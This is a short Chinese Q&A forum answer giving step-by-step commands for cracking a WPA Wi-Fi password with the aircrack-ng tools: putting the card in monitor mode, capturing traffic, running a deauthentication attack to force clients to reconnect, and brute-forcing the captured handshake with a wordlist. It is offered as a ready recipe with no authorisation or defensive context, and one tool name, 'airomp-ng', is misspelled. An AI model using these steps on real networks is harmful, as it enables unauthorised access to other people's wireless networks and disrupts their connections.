发布网友 发布时间:2022-04-19 13:36
共1个回答
热心网友 时间:2023-11-20 16:13
可以的。
步骤如下:
0、进入Terminnal
1、开始监控wlan(airmon-ng是BT5的工具)
airmon-ng start wlan0
2、开始抓包(test为抓到的包的文件命名)
airomp-ng -w test mon0
3、监控制定信道(-c后跟的参数是哪个频道)
airomp-ng -c 11 -w test mon0
4、Deauth攻击(-0后跟的参数是攻击次数)
这个操作主要是伪造数据包使客户端与无线路由器断链,从而重连,因此我们可以截获到中间的数据包)
aireplay-ng -0 5 -a MAC地址(BSSID) -c MAC地址(STATION) mon0
5、出现WPA handshake字段
6、开始指定字典进行破解(-w后跟的是字典路径,test-*.cap是指前面截获到的数据包)
aircrack-ng -w /pentest/passwords/wordlists/yeslab.lst test-*.cap
7、完成。